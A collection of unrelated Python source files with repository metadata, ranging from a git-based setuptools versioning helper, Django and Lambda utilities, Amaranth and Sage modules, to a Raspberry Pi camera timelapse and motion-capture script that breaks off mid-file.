bmiklautz/setuptools-git-versioning
|
bc7e35002c26cca619c8fbdd2e62c6b065f744d8
|
[
"MIT"
] | null | null | null |
setuptools_git_versioning.py
|
bmiklautz/setuptools-git-versioning
|
bc7e35002c26cca619c8fbdd2e62c6b065f744d8
|
[
"MIT"
] | null | null | null |
setuptools_git_versioning.py
|
bmiklautz/setuptools-git-versioning
|
bc7e35002c26cca619c8fbdd2e62c6b065f744d8
|
[
"MIT"
] | null | null | null |
import os
import subprocess
from setuptools.dist import Distribution
from distutils.errors import DistutilsSetupError
from typing import List, Optional, Any, Callable
from six.moves import collections_abc
DEFAULT_TEMPLATE = "{tag}" # type: str
DEFAULT_DEV_TEMPLATE = "{tag}.dev{ccount}+git.{sha}" # type: str
DEFAULT_DIRTY_TEMPLATE = "{tag}.dev{ccount}+git.{sha}.dirty" # type: str
DEFAULT_STARTING_VERSION = '0.0.1'
def _exec(cmd): # type: (str) -> List[str]
try:
stdout = subprocess.check_output(cmd, shell=True,
universal_newlines=True)
except subprocess.CalledProcessError as e:
stdout = e.output
lines = stdout.splitlines()
return [line.rstrip() for line in lines if line.rstrip()]
def get_branches(): # type: () -> List[str]
branches = _exec("git branch -l --format '%(refname:short)'")
if branches:
return branches
return []
def get_branch(): # type: () -> Optional[str]
branches = _exec("git rev-parse --abbrev-ref HEAD")
if branches:
return branches[0]
return None
def get_all_tags(): # type: () -> List[str]
tags = _exec("git tag --sort=-version:refname")
if tags:
return tags
return []
def get_branch_tags(): # type: () -> List[str]
tags = _exec("git tag --sort=-version:refname --merged")
if tags:
return tags
return []
def get_tags(): # type: () -> List[str]
return get_branch_tags
def get_tag(): # type: () -> Optional[str]
tags = get_branch_tags()
if tags:
return tags[0]
return None
def get_sha(name='HEAD'): # type: (str) -> Optional[str]
sha = _exec("git rev-list -n 1 {name}".format(name=name))
if sha:
return sha[0]
return None
def get_latest_file_commit(path): # type: (str) -> Optional[str]
sha = _exec("git log -n 1 --pretty=format:%H -- {path}".format(path=path))
if sha:
return sha[0]
return None
def is_dirty(): # type: () -> bool
res = _exec("git status --short")
if res:
return True
return False
def count_since(name): # type: (str) -> Optional[int]
res = _exec("git rev-list --count HEAD ^{name}".format(name=name))
if res:
return int(res[0])
return None
def parse_config(dist, _, value): # type: (Distribution, Any, Any) -> None
if isinstance(value, bool):
if value:
version = version_from_git()
dist.metadata.version = version
return
else:
raise DistutilsSetupError("Can't be False")
if not isinstance(value, collections_abc.Mapping):
raise DistutilsSetupError("Config in the wrong format")
template = value.get('template', DEFAULT_TEMPLATE)
dev_template = value.get('dev_template', DEFAULT_DEV_TEMPLATE)
dirty_template = value.get('dirty_template', DEFAULT_DIRTY_TEMPLATE)
starting_version = value.get('starting_version', DEFAULT_STARTING_VERSION)
version_callback = value.get('version_callback', None)
version_file = value.get('version_file', None)
count_commits_from_version_file = value.get('count_commits_from_version_file', False)
version = version_from_git(
template=template,
dev_template=dev_template,
dirty_template=dirty_template,
starting_version=starting_version,
version_callback=version_callback,
version_file=version_file,
count_commits_from_version_file=count_commits_from_version_file
)
dist.metadata.version = version
def read_version_from_file(path):
with open(path, 'r') as file:
return file.read().strip()
def version_from_git(template=DEFAULT_TEMPLATE,
dev_template=DEFAULT_DEV_TEMPLATE,
dirty_template=DEFAULT_DIRTY_TEMPLATE,
starting_version=DEFAULT_STARTING_VERSION,
version_callback=None,
version_file=None,
count_commits_from_version_file=False
): # type: (str, str, str, str, Optional[Any, Callable], Optional[str], bool) -> str
# Check if PKG-INFO exists and return value in that if it does
if os.path.exists('PKG-INFO'):
with open('PKG-INFO', 'r') as f:
lines = f.readlines()
for line in lines:
if line.startswith('Version:'):
return line[8:].strip()
from_file = False
tag = get_tag()
if tag is None:
if version_callback is not None:
if callable(version_callback):
return version_callback()
else:
return version_callback
if not os.path.exists(version_file):
return starting_version
else:
from_file = True
tag = read_version_from_file(version_file)
if not count_commits_from_version_file:
return tag
tag_sha = get_latest_file_commit(version_file)
else:
tag_sha = get_sha(tag)
dirty = is_dirty()
head_sha = get_sha()
short_sha = head_sha[:8] if head_sha is not None else ''
ccount = count_since(tag_sha)
on_tag = head_sha is not None and head_sha == tag_sha and not from_file
branch = get_branch()
if dirty:
t = dirty_template
elif not on_tag and ccount is not None:
t = dev_template
else:
t = template
return t.format(sha=short_sha, tag=tag, ccount=ccount, branch=branch)
| 30
| 106
| 0.628051
|
2e64e4e2be15524004187158d11414174fcc389d
| 918
|
py
|
Python
|
manage.py
|
dalmarcogd/test_django_elasticsearch
|
9c97857a7f225a87554637fcae405e8c1a03d0f7
|
[
"Apache-2.0"
] | null | null | null |
manage.py
|
dalmarcogd/test_django_elasticsearch
|
9c97857a7f225a87554637fcae405e8c1a03d0f7
|
[
"Apache-2.0"
] | 13
|
2020-06-05T18:26:43.000Z
|
2021-06-10T20:36:13.000Z
|
backend/server_beta/manage.py
|
dalmarcogd/challenge_ms
|
761f0a588b4c309cf6e226d306df3609c1179b4c
|
[
"MIT"
] | 1
|
2019-04-07T23:42:22.000Z
|
2019-04-07T23:42:22.000Z
|
#!/usr/bin/env python
import os
import sys
try:
import googleclouddebugger
googleclouddebugger.AttachDebugger()
except ImportError:
pass
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "server_beta_project.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
| 31.655172
| 83
| 0.665577
|
91fa9f4ec0e69143231ab78cf116e6d4c795db62
| 1,677
|
py
|
Python
|
source/lambda/active_learning_1p/Output/export_partial.py
|
awslabs/sagemaker-av-visual-perception
|
9956c08bc775b012f1d8c768cc79d8366b5c87f0
|
[
"Apache-2.0"
] | 1
|
2021-10-20T15:30:08.000Z
|
2021-10-20T15:30:08.000Z
|
source/lambda/active_learning_1p/Output/export_partial.py
|
awslabs/sagemaker-av-visual-perception
|
9956c08bc775b012f1d8c768cc79d8366b5c87f0
|
[
"Apache-2.0"
] | null | null | null |
source/lambda/active_learning_1p/Output/export_partial.py
|
awslabs/sagemaker-av-visual-perception
|
9956c08bc775b012f1d8c768cc79d8366b5c87f0
|
[
"Apache-2.0"
] | null | null | null |
import json
from collections import OrderedDict
from s3_helper import S3Ref, download_stringio, upload
import logging
from io import StringIO
logger = logging.getLogger()
logger.setLevel(logging.INFO)
def merge_manifests(full_input, partial_output):
"""
This method merges the output from partial output manifest to the full input
to create the complete manifest.
"""
complete_manifest = OrderedDict()
for line in full_input:
data = json.loads(line)
complete_manifest[data["id"]] = data
logger.info("Loaded input manifest of size {} to memory.".format(
len(complete_manifest)))
for line in partial_output:
data = json.loads(line)
complete_manifest[data["id"]] = data
logger.info("Updated partial output in memory.")
return complete_manifest
def lambda_handler(event, context):
"""
This function is used to merge partial outputs to the manifest.
The result is uploaded to s3.
"""
s3_input_uri = event['ManifestS3Uri']
source = S3Ref.from_uri(s3_input_uri)
full_input = download_stringio(source)
s3_output_uri = event['OutputS3Uri']
output = S3Ref.from_uri(s3_output_uri)
partial_output = download_stringio(output)
logger.info("Downloaded input and output manifests {}, {}".format(
s3_input_uri, s3_output_uri))
complete_manifest = merge_manifests(full_input, partial_output)
#write complete manifest back to s3 bucket
merged = StringIO()
for line in complete_manifest.values():
merged.write(json.dumps(line) + "\n")
upload(merged, source)
logger.info("Uploaded merged file to {}".format(source.get_uri()))
| 32.25
| 80
| 0.709004
|
a9f22fcc82b215eb3a7bce2ac3e14ddd29c5a6e6
| 3,073
|
py
|
Python
|
lambdasoc/sim/blackboxes/serial/wrapper.py
|
shrine-maiden-heavy-industries/lambdasoc
|
c81f27e47eec20e46344ce32dfb2590eb2721c83
|
[
"BSD-2-Clause"
] | null | null | null |
lambdasoc/sim/blackboxes/serial/wrapper.py
|
shrine-maiden-heavy-industries/lambdasoc
|
c81f27e47eec20e46344ce32dfb2590eb2721c83
|
[
"BSD-2-Clause"
] | null | null | null |
lambdasoc/sim/blackboxes/serial/wrapper.py
|
shrine-maiden-heavy-industries/lambdasoc
|
c81f27e47eec20e46344ce32dfb2590eb2721c83
|
[
"BSD-2-Clause"
] | null | null | null |
from amaranth import *
from amaranth.utils import bits_for
__all__ = ["AsyncSerialRX_Blackbox", "AsyncSerialTX_Blackbox", "AsyncSerial_Blackbox"]
class AsyncSerialRX_Blackbox(Elaboratable):
def __init__(self, *, divisor, divisor_bits=None, data_bits=8, parity="none", parent=None):
if parent is not None and not isinstance(parent, AsyncSerial_Blackbox):
raise TypeError("Parent must be an instance of AsyncSerial_Blackbox, not {!r}"
.format(parent))
self.parent = parent
self.divisor = Signal(divisor_bits or bits_for(divisor))
self.data = Signal(data_bits)
self.err = Record([
("overflow", 1),
("frame", 1),
("parity", 1),
])
self.rdy = Signal()
self.ack = Signal()
def elaborate(self, platform):
return Instance("serial_rx",
p_ID = hex(id(self.parent) if self.parent else id(self)),
p_DATA_BITS = len(self.data),
i_clk = ClockSignal("sync"),
o_data = self.data,
o_err_overflow = self.err.overflow,
o_err_frame = self.err.frame,
o_err_parity = self.err.parity,
o_rdy = self.rdy,
i_ack = self.ack,
)
class AsyncSerialTX_Blackbox(Elaboratable):
def __init__(self, *, divisor, divisor_bits=None, data_bits=8, parity="none", parent=None):
if parent is not None and not isinstance(parent, AsyncSerial_Blackbox):
raise TypeError("Parent must be an instance of AsyncSerial_Blackbox, not {!r}"
.format(parent))
self._parent = parent
self.divisor = Signal(divisor_bits or bits_for(divisor))
self.data = Signal(data_bits)
self.rdy = Signal()
self.ack = Signal()
def elaborate(self, platform):
return Instance("serial_tx",
p_ID = hex(id(self._parent) if self._parent else id(self)),
p_DATA_BITS = len(self.data),
i_clk = ClockSignal("sync"),
i_data = self.data,
o_rdy = self.rdy,
i_ack = self.ack,
)
class AsyncSerial_Blackbox(Elaboratable):
def __init__(self, *, divisor, divisor_bits=None, **kwargs):
self.divisor = Signal(divisor_bits or bits_for(divisor), reset=divisor)
self.rx = AsyncSerialRX_Blackbox(
divisor = divisor,
divisor_bits = divisor_bits,
parent = self,
**kwargs
)
self.tx = AsyncSerialTX_Blackbox(
divisor = divisor,
divisor_bits = divisor_bits,
parent = self,
**kwargs
)
def elaborate(self, platform):
m = Module()
m.submodules.rx = self.rx
m.submodules.tx = self.tx
m.d.comb += [
self.rx.divisor.eq(self.divisor),
self.tx.divisor.eq(self.divisor),
]
return m
| 34.144444
| 95
| 0.556459
|
e1e3a89e5a3f358c5099625ceda51c9d2088ee23
| 768
|
py
|
Python
|
Linearmodel-Python.py
|
atompa/Python_regrex1_script
|
b04647dc7187062e93022c118199d24fa1809871
|
[
"Apache-2.0"
] | null | null | null |
Linearmodel-Python.py
|
atompa/Python_regrex1_script
|
b04647dc7187062e93022c118199d24fa1809871
|
[
"Apache-2.0"
] | null | null | null |
Linearmodel-Python.py
|
atompa/Python_regrex1_script
|
b04647dc7187062e93022c118199d24fa1809871
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
import pandas as pd
import sys
df = pd.read_csv(sys.argv[1])
print (df)
import matplotlib.pyplot as plt
x = df.x
y = df.y
plt.scatter(x,y)
plt.title('Regrex Data')
plt.xlabel('x')
plt.ylabel('y')
plt.show()
plt.savefig('Scatterplot_Python.png')
import numpy as np
from sklearn.linear_model import LinearRegression
X = df.x.to_numpy()
X = X.reshape(-1, 1)
y = df.y.to_numpy ()
y = y.reshape(-1,1)
reg = LinearRegression().fit(X, y)
reg.score(X, y)
reg.coef_
reg.intercept_
y_predict = reg.predict(X)
plt.scatter(x,y)
plt.plot(X,y_predict)
plt.title('Regrex Data')
plt.xlabel('x')
plt.ylabel('y')
plt.show()
plt.scatter(x, y, color='black')
plt.show()
plt.savefig('Linearplot_Python.png')
| 9.721519
| 49
| 0.669271
|
999f90772d6153629012e207830cc57bdfc43e16
| 2,254
|
py
|
Python
|
pycnc/Operation.py
|
BbiKkuMi/heekscnc
|
7a5dbea079f176c5dbc1e7f83313ff43f8fe5084
|
[
"BSD-3-Clause"
] | 107
|
2015-01-13T20:42:11.000Z
|
2022-02-12T22:20:50.000Z
|
pycnc/Operation.py
|
BbiKkuMi/heekscnc
|
7a5dbea079f176c5dbc1e7f83313ff43f8fe5084
|
[
"BSD-3-Clause"
] | 31
|
2015-10-03T07:30:54.000Z
|
2021-02-09T22:06:28.000Z
|
pycnc/Operation.py
|
BbiKkuMi/heekscnc
|
7a5dbea079f176c5dbc1e7f83313ff43f8fe5084
|
[
"BSD-3-Clause"
] | 55
|
2015-02-17T00:41:47.000Z
|
2022-02-14T11:26:46.000Z
|
from Object import Object
from consts import *
import HeeksCNC
from CNCConfig import CNCConfig
class Operation(Object):
def __init__(self):
Object.__init__(self)
self.active = True
self.comment = ''
self.title = self.TypeName()
self.tool_number = 0
def TypeName(self):
return "Operation"
def icon(self):
# the name of the PNG file in the HeeksCNC icons folder
if self.active:
return self.op_icon()
else:
return "noentry"
def CanBeDeleted(self):
return True
def UsesTool(self): # some operations don't use the tool number
return True
def ReadDefaultValues(self):
config = CNCConfig()
self.tool_number = config.ReadInt("OpTool", 0)
if self.tool_number != 0:
default_tool = HeeksCNC.program.tools.FindTool(self.tool_number)
if default_tool == None:
self.tool_number = 0
else:
self.tool_number = default_tool.tool_number
if self.tool_number == 0:
first_tool = HeeksCNC.program.tools.FindFirstTool(TOOL_TYPE_SLOTCUTTER)
if first_tool:
self.tool_number = first_tool.tool_number
else:
first_tool = HeeksCNC.program.tools.FindFirstTool(TOOL_TYPE_ENDMILL)
if first_tool:
self.tool_number = first_tool.tool_number
else:
first_tool = HeeksCNC.program.tools.FindFirstTool(TOOL_TYPE_BALLENDMILL)
if first_tool:
self.tool_number = first_tool.tool_number
def WriteDefaultValues(self):
config = CNCConfig()
if self.tool_number != 0:
config.WriteInt("OpTool", self.tool_number)
def AppendTextToProgram(self):
if len(self.comment) > 0:
HeeksCNC.program.python_program += "comment(" + self.comment + ")\n"
if self.UsesTool():
HeeksCNC.machine_state.AppendToolChangeText(self.tool_number) # Select the correct tool.
| 34.151515
| 102
| 0.562112
|
0c32056c1dfd9798240d4e436b9cb7b5937e88e9
| 7,240
|
py
|
Python
|
src/sage/combinat/ranker.py
|
switzel/sage
|
7eb8510dacf61b691664cd8f1d2e75e5d473e5a0
|
[
"BSL-1.0"
] | null | null | null |
src/sage/combinat/ranker.py
|
switzel/sage
|
7eb8510dacf61b691664cd8f1d2e75e5d473e5a0
|
[
"BSL-1.0"
] | null | null | null |
src/sage/combinat/ranker.py
|
switzel/sage
|
7eb8510dacf61b691664cd8f1d2e75e5d473e5a0
|
[
"BSL-1.0"
] | 1
|
2020-07-24T12:20:37.000Z
|
2020-07-24T12:20:37.000Z
|
"""
Rankers
"""
#*****************************************************************************
# Copyright (C) 2007 Mike Hansen <mhansen@gmail.com>,
# Nicolas M. Thiery <nthiery at users.sf.net>
# Ported from MuPAD-Combinat (combinat::rankers)
#
# Distributed under the terms of the GNU General Public License (GPL)
#
# This code is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# The full text of the GPL is available at:
#
# http://www.gnu.org/licenses/
#*****************************************************************************
from collections import Iterable, Sequence
from sage.misc.cachefunc import cached_function
from sage.misc.callable_dict import CallableDict
from sage.structure.parent import Parent
from sage.categories.enumerated_sets import EnumeratedSets
def from_list(l):
"""
Returns a ranker from the list l.
INPUT:
- ``l`` - a list
OUTPUT:
- ``[rank, unrank]`` - functions
EXAMPLES::
sage: import sage.combinat.ranker as ranker
sage: l = [1,2,3]
sage: r,u = ranker.from_list(l)
sage: r(1)
0
sage: r(3)
2
sage: u(2)
3
sage: u(0)
1
"""
return [rank_from_list(l), unrank_from_list(l)]
def rank_from_list(l):
r"""
Return a rank function for the elements of ``l``.
INPUT:
- ``l`` -- a duplicate free list (or iterable) of hashable objects
OUTPUT:
- a function from the elements of ``l`` to ``0,...,len(l)``
EXAMPLES::
sage: import sage.combinat.ranker as ranker
sage: l = ['a', 'b', 'c']
sage: r = ranker.rank_from_list(l)
sage: r('a')
0
sage: r('c')
2
For non elements a ``ValueError`` is raised, as with the usual
``index`` method of lists::
sage: r('blah')
Traceback (most recent call last):
...
ValueError: 'blah' is not in dict
Currently, the rank function is a
:class:`~sage.misc.callable_dict.CallableDict`; but this is an
implementation detail::
sage: type(r)
<type 'sage.misc.callable_dict.CallableDict'>
sage: r
{'a': 0, 'c': 2, 'b': 1}
With the current implementation, no error is issued in case of
duplicate value in ``l``. Instead, the rank function returns the
position of some of the duplicates::
sage: r = ranker.rank_from_list(['a', 'b', 'a', 'c'])
sage: r('a')
2
Constructing the rank function itself is of complexity
``O(len(l))``. Then, each call to the rank function consists of an
essentially constant time dictionary lookup.
TESTS::
sage: TestSuite(r).run()
"""
return CallableDict((x,i) for i,x in enumerate(l))
def unrank_from_list(l):
"""
Returns an unrank function from a list.
EXAMPLES::
sage: import sage.combinat.ranker as ranker
sage: l = [1,2,3]
sage: u = ranker.unrank_from_list(l)
sage: u(2)
3
sage: u(0)
1
"""
unrank = lambda j: l[j]
return unrank
def on_fly():
"""
Returns a pair of enumeration functions rank / unrank.
rank assigns on the fly an integer, starting from 0, to any object
passed as argument. The object should be hashable. unrank is the
inverse function; it returns None for indices that have not yet
been assigned.
EXAMPLES::
sage: [rank, unrank] = sage.combinat.ranker.on_fly()
sage: rank('a')
0
sage: rank('b')
1
sage: rank('c')
2
sage: rank('a')
0
sage: unrank(2)
'c'
sage: unrank(3)
sage: rank('d')
3
sage: unrank(3)
'd'
.. todo:: add tests as in combinat::rankers
"""
def count():
i = 0
while True:
yield i
i+=1
counter = count()
@cached_function
def rank(x):
i = next(counter)
unrank.set_cache(x, i)
return i
@cached_function
def unrank(i):
return None
return [rank, unrank]
def unrank(L, i):
r"""
Return the `i`-th element of `L`.
INPUT:
- ``L`` -- a list, tuple, finite enumerated set, ...
- ``i`` -- an int or :class:`Integer`
The purpose of this utility is to give a uniform idiom to recover
the `i`-th element of an object ``L``, whether ``L`` is a list,
tuple (or more generally a :class:`collections.Sequence`), an
enumerated set, some old parent of Sage still implementing
unranking in the method ``__getitem__``, or an iterable (see
:class:`collections.Iterable`). See :trac:`15919`.
EXAMPLES:
Lists, tuples, and other :class:`sequences <collections.Sequence>`::
sage: from sage.combinat.ranker import unrank
sage: unrank(['a','b','c'], 2)
'c'
sage: unrank(('a','b','c'), 1)
'b'
sage: unrank(xrange(3,13,2), 1)
5
Enumerated sets::
sage: unrank(GF(7), 2)
2
sage: unrank(IntegerModRing(29), 10)
10
An old parent with unranking implemented in ``__getitem__``::
sage: M = MatrixSpace(GF(3), 2, 2)
sage: hasattr(M, "unrank")
False
sage: M[42]
[1 0]
[2 1]
sage: unrank(M, 42)
[1 0]
[2 1]
An iterable::
sage: unrank(NN,4)
4
An iterator::
sage: unrank(('a{}'.format(i) for i in range(20)), 0)
'a0'
sage: unrank(('a{}'.format(i) for i in range(20)), 2)
'a2'
.. WARNING::
When unranking an iterator, it returns the ``i``-th element
beyond where it is currently at::
sage: from sage.combinat.ranker import unrank
sage: it = iter(range(20))
sage: unrank(it, 2)
2
sage: unrank(it, 2)
5
TESTS::
sage: from sage.combinat.ranker import unrank
sage: unrank(range(3), 10)
Traceback (most recent call last):
...
IndexError: list index out of range
sage: unrank(('a{}'.format(i) for i in range(20)), 22)
Traceback (most recent call last):
...
IndexError: index out of range
sage: M[100]
Traceback (most recent call last):
...
IndexError: list index out of range
"""
if L in EnumeratedSets:
return L.unrank(i)
if isinstance(L, Sequence):
return L[i]
if isinstance(L, Parent):
# handle parents still implementing unranking in __getitem__
try:
return L[i]
except (AttributeError, TypeError, ValueError):
pass
if isinstance(L, Iterable):
try:
it = iter(L)
for _ in range(i):
next(it)
return next(it)
except StopIteration as e:
raise IndexError("index out of range")
raise ValueError("Don't know how to unrank on {}".format(L))
| 25.051903
| 78
| 0.549171
|
7a3051d00f38e0eff75bb168e585010e8a372ed4
| 16,015
|
py
|
Python
|
camera.py
|
Xorfor/Camera
|
7c60fad8099d3e25d67aaaf0c9755cdd114de024
|
[
"MIT"
] | 1
|
2019-09-12T05:14:21.000Z
|
2019-09-12T05:14:21.000Z
|
camera.py
|
Xorfor/Camera
|
7c60fad8099d3e25d67aaaf0c9755cdd114de024
|
[
"MIT"
] | null | null | null |
camera.py
|
Xorfor/Camera
|
7c60fad8099d3e25d67aaaf0c9755cdd114de024
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ================================================================================
# Based on:
# //github.com/pageauc/pi-timolo
# ================================================================================
# import RPi.GPIO as GPIO
import os
import datetime
import sys
import time
import picamera
import picamera.array
import logging
import modus
import signal
import io
import numpy as np
from fractions import Fraction
from config import *
# ================================================================================
# Constants
# ================================================================================
# Constant for converting Shutter Speed in Seconds to Microseconds
SECONDS2MICRO = 1000000
camNightISO = 800
camNightShutSpeed = 6 * SECONDS2MICRO
# ================================================================================
# System Variables, should not need to be customized
# ================================================================================
appName = "Camera"
appVersion = "0.2"
camera = picamera.PiCamera()
procesTime = 1
# --------------------------------------------------------------------------------
# Globals
# --------------------------------------------------------------------------------
actionCount = 0
imageCount = 1
motion_detected = False
last_still_capture_time = datetime.datetime.now()
imgExtension = "jpg"
# --------------------------------------------------------------------------------
# Logging
# --------------------------------------------------------------------------------
logging.basicConfig(
level=logging.WARNING,
format="[%(levelname)-8s] %(asctime)s %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
)
logger = logging.getLogger(__name__)
logger.setLevel(appLoggingLevel)
__MODI = [
modus.MOTIONIMAGE,
modus.MOTIONVIDEO,
modus.PIRIMAGE,
modus.PIRVIDEO,
modus.TESTIMAGE,
modus.TIMELAPSE,
]
# --------------------------------------------------------------------------------
# Setup PIR
# --------------------------------------------------------------------------------
# Setting the GPIO (General Purpose Input Output) pins up so we can detect if they are HIGH or LOW (on or off)
# GPIO.setmode(GPIO.BOARD)
# GPIO.setup(pirSensorPin, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
# --------------------------------------------------------------------------------
# The 'analyse' method gets called on every frame processed while picamera
# is recording h264 video.
# It gets an array (see: "a") of motion vectors from the GPU.
# --------------------------------------------------------------------------------
def check_folders():
"""
This procedure will check for the image and video folders. If they don't exist,
the procedure will create them.
"""
logger.info("check_folders")
# Checks for image folders and creates them if they do not already exist.
if (
appModus == modus.TESTIMAGE
or appModus == modus.MOTIONIMAGE
or appModus == modus.TIMELAPSE
):
if not os.path.isdir(gbImageDir):
logger.debug("Creating image folder {}".format(gbImageDir))
os.makedirs(gbImageDir)
logger.debug("Folder {}".format(gbImageDir))
if appModus == modus.MOTIONVIDEO:
if not os.path.isdir(gbVideoDir):
logger.debug("Creating video folder {}".format(gbVideoDir))
os.makedirs(gbVideoDir)
logger.debug("Folder {}".format(gbVideoDir))
# --------------------------------------------------------------------------------
def signal_term_handler(signal, frame):
logger.critical("signal_term_handler")
# this raises SystemExit(0) which fires all "try...finally" blocks:
sys.exit(0)
# this is useful when this program is started at boot via init.d
# or an upstart script, so it can be killed: i.e. kill some_pid:
signal.signal(signal.SIGTERM, signal_term_handler)
# --------------------------------------------------------------------------------
def show_time():
return datetime.datetime.now().strftime(gbDateTimeFormat)
# --------------------------------------------------------------------------------
def ctrl_c():
logger.critical("ctrl_c")
# GPIO.cleanup()
# --------------------------------------------------------------------------------
def close_camera():
logger.info("close_camera")
camera.close()
# GPIO.cleanup()
logger.info("Actions: {}".format(actionCount))
logger.debug("Camera turned off")
# --------------------------------------------------------------------------------
def init_camera():
logger.info("init_camera")
revision = camera.revision
if revision == "ov5647":
version = "V1.x"
elif revision == "imx219":
version = "V2.x"
else:
version = "unknown"
logger.info("camera version: {}".format(version))
# Global settings
camera.resolution = (camHeight, camWidth)
camera.rotation = camRotation
camera.vflip = camVFlip
camera.hflip = camHFlip
logger.debug("camera.resolution = ({},{})".format(camWidth, camHeight))
logger.debug("camera.rotation = {}".format(camera.rotation))
logger.debug("camera.vflip = {}".format(camera.vflip))
logger.debug("camera.hflip = {}".format(camera.hflip))
# Specific settings
# Video settings
if appModus == modus.MOTIONVIDEO:
logger.debug("vidVideoTime = {}".format(vidVideoTime))
# Image settings
else:
logger.debug("camAnnotate = {}".format(camAnnotate))
if camAnnotate:
camera.annotate_text_size = camAnnotateTextSize
# camera.annotate_foreground = camAnnotateForeground
# camera.annotate_background = camAnnotateBackground
logger.debug(
"camera.annotate_text_size = {}".format(camera.annotate_text_size)
)
# logger.info( "camera.annotate_foreground = %s" % ( camera.annotate_foreground ) )
# logger.info( "camera.annotate_background = %s" % ( camera.annotate_background ) )
camera.framerate = camFrameRate
camera.led = camLed
camera.awb_mode = "auto"
if camDay:
camera.exposure_mode = "auto"
else:
camera.exposure_mode = "night"
logger.debug("camera.framerate = {}".format(camera.framerate))
logger.debug("camera.led = {}".format(camLed))
logger.debug("camera.exposure_mode = {}".format(camera.exposure_mode))
logger.debug("camera.awb_mode = {}".format(camera.awb_mode))
logger.debug("camera.shutter_speed = {}".format(camera.shutter_speed))
logger.debug("camera.iso = {}".format(camera.iso))
logger.info("Camera initialized")
# --------------------------------------------------------------------------------
def capture_image(fname):
""" This procedure will actually take the image and save the image as specified
by fname
Args:
fname : The filename to save the image
"""
logger.info("capture_image")
if camAnnotate:
camera.annotate_text = show_time()
logger.debug("image = {}".format(fname))
camera.capture(fname, imgFormat)
# --------------------------------------------------------------------------------
def write_video(stream):
""" Write the entire content of the circular buffer to disk. No need to
lock the stream here as we're definitely not writing to it simultaneously.
"""
logger.info("write_video")
with io.open("before.h264", "wb") as output:
for frame in stream.frames:
if frame.frame_type == picamera.PiVideoFrameType.sps_header:
stream.seek(frame.position)
break
while True:
buf = stream.read1()
if not buf:
break
output.write(buf)
# Wipe the circular stream once we're done
stream.seek(0)
stream.truncate()
################################################################################
# Main procedures
################################################################################
def start_test_image():
""" This will make an image which can be used to position the camera and set
the configuration.
"""
logger.info("start_test_image")
global actionCount
init_camera()
logger.debug("Making test image")
capture_image(fname("test"))
actionCount += 1
logger.debug("Test image ended")
close_camera()
# --------------------------------------------------------------------------------
def start_timelapse():
""" This will take timelapse images. Images are stored with a sequence number.
"""
global imageCount
global actionCount
logger.info("start_timelapse")
try:
init_camera()
logger.info(
"This will take approx. {} sec.".format(tlTotalImages * tlTimeBetween)
)
imageCount = 0
while imageCount < tlTotalImages:
capture_image(
fname(str(tlSequenceStart + imageCount).zfill(tlSequenceSize))
)
logger.debug(
"TimeLapse {} = {}".format(imageCount, tlSequenceStart + imageCount)
)
imageCount += 1
actionCount += 1
# Takes roughly 6 seconds to take a picture
time.sleep(tlTimeBetween - procesTime)
except KeyboardInterrupt as e:
ctrl_c()
finally:
logger.info("Timelapse has ended.")
close_camera()
# --------------------------------------------------------------------------------
def start_motion_image():
logger.info("start_motion_image")
global motion_detected
global imageCount
global actionCount
init_camera()
imageCount = 1
with detect_motion(camera) as output:
try:
# record video to nowhere, as we are just trying to capture images:
camera.start_recording("/dev/null", format="h264", motion_output=output)
motion_detected = False
logger.debug("Waiting for motion...")
while True:
camera.wait_recording(mtnMinimumStillSec)
if motion_detected:
logger.debug("Stop recording and capture an image...")
camera.stop_recording()
capture_image(None)
imageCount += 1
actionCount += 1
camera.start_recording(
"/dev/null", format="h264", motion_output=output
)
motion_detected = False
logger.debug("Waiting for motion...")
except KeyboardInterrupt as e:
ctrl_c()
finally:
logger.info("Detect motion has ended.")
close_camera()
# --------------------------------------------------------------------------------
def start_motion_video():
logger.info("start_motion_video")
global motion_detected
global imageCount
global actionCount
init_camera()
imageCount = 1
fileStr = gbVideoDir + "/" + "mov" + "%s" + tlSuffix + ".h264"
with detect_motion(camera) as output:
try:
# record video to nowhere, as we are just trying to capture images:
camera.start_recording("/dev/null", format="h264", motion_output=output)
motion_detected = False
logger.debug("Waiting for motion...")
while True:
camera.wait_recording(mtnMinimumStillSec)
if motion_detected:
logger.debug("Recording video...")
camera.stop_recording()
camera.start_recording(fileStr % imageCount, format="h264")
camera.wait_recording(vidVideoTime)
camera.stop_recording()
imageCount += 1
actionCount += 1
camera.start_recording(
"/dev/null", format="h264", motion_output=output
)
motion_detected = False
logger.debug("Waiting for motion...")
except KeyboardInterrupt as e:
ctrl_c()
finally:
logger.debug("Detect motion has ended.")
close_camera()
# --------------------------------------------------------------------------------
def start_pir_image():
logger.info("start_pir_image")
global imageCount
global actionCount
init_camera()
imageCount = 1
try:
# Defining our default states so we can detect a change
prev_state = False
curr_state = False
logger.debug("Waiting for motion...")
while True:
time.sleep(0.1)
prev_state = curr_state
# Map the state of the camera to our input pins (jumper cables connected to your PIR)
# curr_state = GPIO.input(pirSensorPin)
# Checking whether the state has changed
if curr_state != prev_state:
# Check if our new state is HIGH or LOW
new_state = "HIGH" if curr_state else "LOW"
logger.debug("GPIO pin {} is {}".format(pirSensorPin, new_state))
if (
curr_state
): # State has changed to HIGH, so that must be a trigger from the PIR
capture_image(None)
imageCount += 1
actionCount += 1
except KeyboardInterrupt as e:
KeyboardInterrupt()
finally:
logger.debug("Detect PIR Image has ended.")
close_camera()
# --------------------------------------------------------------------------------
def start_pir_motion():
logger.info("start_pir_motion")
# ================================================================================
# Helper functions
# ================================================================================
def fname(name):
logger.debug("fname")
return "{}/{}{}{}{}".format(gbImageDir, tlPrefix, name, tlSuffix, imgExtension)
# ********************************************************************************
class detect_motion(picamera.array.PiMotionAnalysis):
